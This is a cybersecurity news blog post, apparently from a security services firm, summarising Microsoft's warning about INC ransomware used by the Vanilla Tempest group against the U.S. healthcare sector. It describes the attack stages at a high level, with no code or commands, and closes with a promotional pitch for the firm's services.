Microsoft has issued a warning regarding a new ransomware strain named INC, which is being used by a financially motivated threat actor to target the U.S. healthcare sector. This alarming development highlights the ongoing risks faced by healthcare organizations in the digital landscape.
Key Takeaways
New Ransomware Strain: The INC ransomware is being deployed for the first time against healthcare entities.
Threat Actor: The activity is tracked under the name Vanilla Tempest, previously known as DEV-0832.
Attack Methodology: Attackers utilize tools like Supper backdoor and AnyDesk for lateral movement before deploying ransomware.
Historical Context: Vanilla Tempest has been active since July 2022, targeting various sectors including education and manufacturing.
Overview of the Threat
Microsoft's threat intelligence team has identified a new player in the ransomware landscape, known as Vanilla Tempest. This group has been linked to a series of attacks that have increasingly targeted the healthcare sector, which is particularly vulnerable due to the sensitive nature of the data it handles.
The INC ransomware is notable for its sophisticated deployment methods, which involve a multi-step process that begins with GootLoader infections. Once the initial foothold is established, attackers leverage tools such as the Supper backdoor and AnyDesk to navigate through the network.
Attack Methodology
The attack process can be broken down into several key steps:
Initial Infection: The threat actor uses GootLoader to gain access to the network.
Lateral Movement: Utilizing Remote Desktop Protocol (RDP), attackers move laterally within the network.
Payload Deployment: The final step involves deploying the INC ransomware payload using Windows Management Instrumentation (WMI) Provider Host.
This methodical approach allows attackers to maximize their chances of success while minimizing the risk of detection.
Historical Context and Previous Targets
Vanilla Tempest has been active since at least July 2022, with a history of targeting various sectors, including:
Healthcare
Education
IT
Manufacturing
In previous attacks, the group has utilized various ransomware families, such as BlackCat, Quantum Locker, Zeppelin, and Rhysida. This adaptability in using different ransomware strains demonstrates the group's capability and intent to exploit vulnerabilities across multiple industries.
Evolving Tactics in Ransomware Attacks
The rise of ransomware groups like BianLian and Rhysida has introduced new tactics for data exfiltration. Recent observations indicate that these groups are increasingly using tools like Azure Storage Explorer and AzCopy to transfer sensitive data to cloud storage, thereby evading traditional detection methods.
Britton Manahan, a modePUSH researcher, noted that these tools, originally designed for managing Azure storage, are being repurposed by threat actors for large-scale data transfers. This shift in tactics underscores the need for organizations to remain vigilant and adapt their cybersecurity measures accordingly.
The emergence of the INC ransomware strain and the activities of the Vanilla Tempest group serve as a stark reminder of the evolving threat landscape facing the U.S. healthcare sector. As cybercriminals continue to refine their methods, it is crucial for organizations to bolster their defenses and remain proactive in their cybersecurity strategies to protect sensitive data from falling into the wrong hands.
Staying ahead of cyber threats requires constant vigilance and cutting-edge solutions. BetterWorld Technology provides comprehensive cybersecurity services that protect your business from data breaches, ransomware, and other cyberattacks. Our team offers proactive monitoring, threat detection, and rapid incident response to ensure your systems remain secure and your data is safe. Book a consultation with us now and let BetterWorld Technology strengthen your cybersecurity posture and defend your business from the ever-evolving threat landscape.
Sources
Microsoft Warns of New INC Ransomware Targeting U.S. Healthcare Sector, The Hacker News.